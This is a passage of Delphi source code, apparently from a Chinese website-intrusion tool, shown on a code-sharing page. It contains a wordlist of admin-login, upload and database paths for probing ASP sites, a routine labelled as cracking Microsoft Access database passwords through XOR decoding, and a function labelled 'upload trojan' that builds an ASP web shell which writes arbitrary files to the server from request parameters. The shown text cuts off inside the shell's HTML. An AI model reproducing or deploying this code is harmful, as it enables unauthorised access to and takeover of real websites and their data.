📄 unit1.~pas
字号:
CreateText.Add('/data/#dvbbs7.asp');
CreateText.Add('/down_default.asp');
CreateText.Add('/down_addsoft.asp');
CreateText.Add('/bbs/down_picupload.asp');
CreateText.Add('/down_picupload.asp');
CreateText.Add('/dvbbs/upfile.asp');
CreateText.Add('/forum/upfile.asp');
CreateText.Add('/upfile_soft.asp');
CreateText.Add('/upload_soft.asp');
CreateText.Add('/bbs/down_picupfile.asp');
CreateText.Add('/bbs/z_visual_upfile.asp');
CreateText.Add('[ADMIN_LOGIN]');
CreateText.Add('/admin');
CreateText.Add('/admin_index');
CreateText.Add('/admin_admin');
CreateText.Add('/index_admin');
CreateText.Add('/admin/index');
CreateText.Add('/admin/default');
CreateText.Add('/admin/manage');
CreateText.Add('/admin/login');
CreateText.Add('/../admin/index');
CreateText.Add('/../admin/default');
CreateText.Add('/../admin/manage');
CreateText.Add('/../admin/login');
CreateText.Add('/../admin/fuckyou');
CreateText.Add('/admin_index.asp');
CreateText.Add('/bbs/admin_index.asp');
CreateText.Add('/manage');
CreateText.Add('/login');
CreateText.Add('/manage_index');
CreateText.Add('/index_manage');
CreateText.Add('/wocaonima');
CreateText.Add('/admin1');
CreateText.Add('/admin_login');
CreateText.Add('/login_admin');
CreateText.Add('/ad_login');
CreateText.Add('/ad_manage');
CreateText.Add('/count');
CreateText.Add('/login');
CreateText.Add('/manage');
CreateText.Add('/manager');
CreateText.Add('/guanli');
CreateText.Add('/denglu');
CreateText.Add('/houtai');
CreateText.Add('/houtaiguanli');
CreateText.Add('/htgl');
CreateText.Add('/adminlogin');
CreateText.Add('/adminuserlogin');
CreateText.Add('/admin_login');
CreateText.Add('/adm_login');
CreateText.Add('/chklogin');
CreateText.Add('/chkadmin');
CreateText.Add('/user');
CreateText.Add('/users');
CreateText.Add('/adduser');
CreateText.Add('/adminuser');
CreateText.Add('/admin_user');
CreateText.Add('/edituser');
CreateText.Add('/adduser');
CreateText.Add('/adminadduser');
CreateText.Add('/member');
CreateText.Add('/members');
CreateText.Add('/editmember');
CreateText.Add('/adminmember');
CreateText.Add('/addmember');
CreateText.Add('/logout');
CreateText.Add('/exit');
CreateText.Add('/login_out');
CreateText.Add('/edit');
CreateText.Add('/adminedit');
CreateText.Add('/admin_edit');
CreateText.Add('/delete');
CreateText.Add('/admindelete');
CreateText.Add('/admin_delete');
CreateText.Add('/del');
CreateText.Add('/admindel');
CreateText.Add('/admin_del');
CreateText.Add('/up');
CreateText.Add('/upload');
CreateText.Add('/upfile');
CreateText.Add('/backup');
CreateText.Add('/config');
CreateText.Add('/test');
CreateText.Add('/webmaster');
CreateText.Add('/root');
CreateText.Add('/aadmin');
CreateText.Add('/admintab');
CreateText.Add('/admin_main');
CreateText.Add('/main');
CreateText.Add('/art');
CreateText.Add('/article');
CreateText.Add('/databases');
CreateText.Add('/database');
CreateText.Add('/db');
CreateText.Add('/dbase');
CreateText.Add('/devel');
CreateText.Add('/file');
CreateText.Add('/files');
CreateText.Add('/forum');
CreateText.Add('/girl');
CreateText.Add('/girls');
CreateText.Add('/htdocs');
CreateText.Add('/htdocs');
CreateText.Add('/idea');
CreateText.Add('/ideas');
CreateText.Add('/include');
CreateText.Add('/includeinc');
CreateText.Add('/includes');
CreateText.Add('/incoming');
CreateText.Add('/install');
CreateText.Add('/manual');
CreateText.Add('/misc');
CreateText.Add('/mrtg');
CreateText.Add('/private');
CreateText.Add('/program');
CreateText.Add('/programming');
CreateText.Add('/programs');
CreateText.Add('/public');
CreateText.Add('/secret');
CreateText.Add('/secrets');
CreateText.Add('/server_stats');
CreateText.Add('/server-info');
CreateText.Add('/server-status');
CreateText.Add('/set');
CreateText.Add('/setting');
CreateText.Add('/setup');
CreateText.Add('/***');
CreateText.Add('/snmp');
CreateText.Add('/source');
CreateText.Add('/sources');
CreateText.Add('/sql');
CreateText.Add('/stat');
CreateText.Add('/statistics');
CreateText.Add('/Stats');
CreateText.Add('/stats');
CreateText.Add('/telephone');
CreateText.Add('/temp');
CreateText.Add('/temporary');
CreateText.Add('/tool');
CreateText.Add('/tools');
CreateText.Add('/usage');
CreateText.Add('/weblog');
CreateText.Add('/weblogs');
CreateText.Add('/webstats');
CreateText.Add('/work');
CreateText.Add('/wstats');
CreateText.Add('/wwwlog');
CreateText.Add('/wwwstats');
CreateText.Add('/www');
CreateText.Add('/wenzhang');
CreateText.SaveToFile(ExtractFilePath(application.ExeName) + 'SearchPage.txt');
Form1.CLBox.Items.Text := SearchUP;
Form1.CLBox.Checked[0] := True;
Form1.CLBox.Checked[1] := True;
Form1.CLBox.Checked[2] := True;
end;
function SearchAdmin: string; //管理后台函数
var
P1: integer;
begin
S_1 := TStringList.Create;
S_1.LoadFromFile(ExtractFilePath(Application.ExeName) + 'SearchPage.txt');
P1 := Pos('[ADMIN_LOGIN]', S_1.Text);
Result := Copy(S_1.Text, P1 + Length('[ADMIN_LOGIN]') + 2, Length(S_1.Text));
end;
function TForm1.Rep: string; //===================== 自选上传木马路径 ==============
var
pos1: integer;
str: string;
begin
str := ASPFileName.Text;
while pos('\', str) > 0 do
begin
pos1 := pos('\', str);
str := StringReplace(str, '\', '', [rfIgnoreCase]);
end;
str := copy(str, pos1, length(ASPFileName.Text));
Result := Str;
end;
function TForm1.ExecFile(FName: string): PassType; //=============== 破解ACCESS密码 ============
function CovTime(FD: _FileTime): TDateTime;
var
TCT: _SystemTime;
Tmp: _FileTime;
begin
FileTimeToLocalFileTime(FD, Tmp);
FileTimeToSystemTime(Tmp, TCT);
Result := SystemTimeToDateTime(TCT);
end;
var
Stream: TFileStream;
i, n: integer;
TP: TSearchRec;
WTime: TDateTime;
WSec: DWord;
M, S: string;
Buf: array[0..200] of byte;
Date0: TDateTime;
Date1: TDateTime;
Date2: TDateTime;
const
XorStr = $823E6C94;
begin
FindFirst(FName, faAnyFile, TP);
Stream := TFileStream.Create(FName, fmOpenReadWrite);
Stream.Seek($00, 00); Stream.Read(Buf[0], 200);
if Buf[$14] = 0 then begin
PassCode := '';
Stream.Seek($42, 00); Stream.Read(Buf[0], 20);
for i := 0 to 19 do
PassCode := PassCode + chr(Buf[i] xor InCode97[i]);
Result.PassCode := PassCode;
Result.FileType := 'ACCESS-97';
Result.FileTime := Now;
Exit; // 按Access97版本处理
end;
Date0 := EncodeDate(1978, 7, 01);
Date1 := EncodeDate(1989, 9, 17);
Date2 := EncodeDate(2079, 6, 05);
Stream.Seek($42, 00); Stream.Read(ReaderArray[0], 40);
Stream.Seek($75, 00); Stream.Read(DateStr, 4);
Stream.Free;
for i := $42 to $42 + 55 do begin
if i = $72 then M := '-' else M := '';
S := S + #32 + M + IntToHex(Buf[i], 2);
end;
Delete(S, 1, 1);
if (DateStr >= $90000000) and (DateStr < $B0000000) then begin
WSec := DateStr xor $903E6C94;
WTime := Date2 + WSec / 8192 * 2;
end else begin
WSec := DateStr xor $803E6C94;
WTime := Date1 + WSec / 8192;
if WSec and $30000000 <> 0 then begin
WSec := $40000000 - WSec;
WTime := Date1 - WSec / 8192 / 2;
end;
end;
if WTime < Date1 then begin
for i := 0 to 9 do begin
EncodeArray[i * 2] := (Trunc(WTime) - Trunc(Date0)) xor UserCode[i] xor $F000;
// Xor $F000 就是“高位取反”
EncodeArray[i * 2 + 1] := InhereCode[i];
end;
end;
if (WTime >= Date1) and (WTime < Date2) then begin
for i := 0 to 9 do begin
EncodeArray[i * 2] := (Trunc(WTime) - Trunc(Date1)) xor UserCode[i];
EncodeArray[i * 2 + 1] := InhereCode[i];
end;
end;
if WTime >= Date2 then begin
for i := 0 to 9 do begin
EncodeArray[i * 2] := (Trunc(WTime) - Trunc(Date1)) xor UserCode[i];
EncodeArray[i * 2 + 1] := InhereCode[i] xor 1;
// Xor 1 就是“末位取反”
end;
end;
PassCode := '';
for i := 0 to 19 do begin
N := EncodeArray[i] xor ReaderArray[i];
// if N <> 0 then PassCode := PassCode + Chr(N);
if N <> 0 then PassCode := PassCode + WideChar(N);
end;
Result.FileType := 'ACCESS-2000';
Result.FileTime := WTime;
Result.PassCode := PassCode;
end;
procedure TForm1.ExecDirectory(S: string); //================= 破解ACCESS密码 =========
var
i: integer;
P: PassType;
begin
CreakDataPath.Text := s;
for i := 1 to 1 do begin
P := ExecFile(S);
if P.PassCode = '' then Continue;
end;
CreakDataPath.Text := s;
DataType.Text := P.FileType;
DataPass.Text := P.PassCode
end;
function TForm1.GetFileMemo: string; //===================== 上传木马的函数 ===============
const
H = #13;
var
FMemo: TStringList;
begin
try
FMemo := TStringList.Create;
if R1_Defautl.Checked then
begin
Fmemo.Add('<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>');
Fmemo.Add('<html>');
Fmemo.Add('<head>');
Fmemo.Add('<meta http-equiv="Content-Type" content="text/html; charset=gb2312">');
Fmemo.Add('<title>ASP木马 SOCUT.COM</title>');
Fmemo.Add('<style type="text/css">');
Fmemo.Add('<!--');
Fmemo.Add('.black {');
Fmemo.Add(' font-family: "宋体";');
Fmemo.Add(' font-size: 12px;');
Fmemo.Add(' color: #000000;');
Fmemo.Add(' text-decoration: none;');
Fmemo.Add(' line-height: 120%;}');
Fmemo.Add('-->');
Fmemo.Add('</style>');
Fmemo.Add('<style type="text/css">');
Fmemo.Add('<!--');
Fmemo.Add('a:link {');
Fmemo.Add(' font-family: "宋体";');
Fmemo.Add(' font-size: 12px;');
Fmemo.Add(' color: #00CC00;');
Fmemo.Add(' text-decoration: none;');
Fmemo.Add('}');
Fmemo.Add('a:visited {');
Fmemo.Add(' font-family: "宋体";');
Fmemo.Add(' font-size: 12px;');
Fmemo.Add(' color: #00CC00;');
Fmemo.Add(' text-decoration: none;');
Fmemo.Add('}');
Fmemo.Add('a:hover {');
Fmemo.Add(' font-family: "宋体";');
Fmemo.Add(' font-size: 12px;');
Fmemo.Add(' color: #333333;');
Fmemo.Add(' text-decoration: none;');
Fmemo.Add('}');
Fmemo.Add('-->');
Fmemo.Add('</style>');
Fmemo.Add('</head>');
Fmemo.Add('<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">');
Fmemo.Add('<p>');
Fmemo.Add('<% dim objFSO %>');
Fmemo.Add('<% dim fdata %>');
Fmemo.Add('<% dim objCountFile %>');
Fmemo.Add('<% on error resume next %>');
Fmemo.Add('<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>');
Fmemo.Add('<% if Trim(request("syfdpath"))<>"" then %>');
Fmemo.Add('<% fdata = request("cyfddata") %>');
Fmemo.Add('<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>');
Fmemo.Add('<% objCountFile.Write fdata %>');
Fmemo.Add('<% if err =0 then %>');
Fmemo.Add('<% response.write "<font color=#FFFF00>save Success!</font>" %>');
Fmemo.Add('<% else %>');
Fmemo.Add('<% response.write "<font color=#FFFF00>Save UnSuccess!</font>" %>');
Fmemo.Add('<% end if %>');
Fmemo.Add('<% err.clear %>');
Fmemo.Add('<% end if %>');
Fmemo.Add('<% objCountFile.Close %>');
Fmemo.Add('<% Set objCountFile=Nothing %>');
Fmemo.Add('<% Set objFSO = Nothing %>');
Fmemo.Add('<% Response.write "</form>" %>');
Fmemo.Add('</p>');
Fmemo.Add('<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">');
Fmemo.Add('<tr>');
Fmemo.Add('<td height="100%"> ');
Fmemo.Add('<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">');
Fmemo.Add('<tr>');
Fmemo.Add('<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">');
Fmemo.Add('<tr>');
Fmemo.Add('<td bgcolor="#FFFFFF"><span class="black"> ');
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -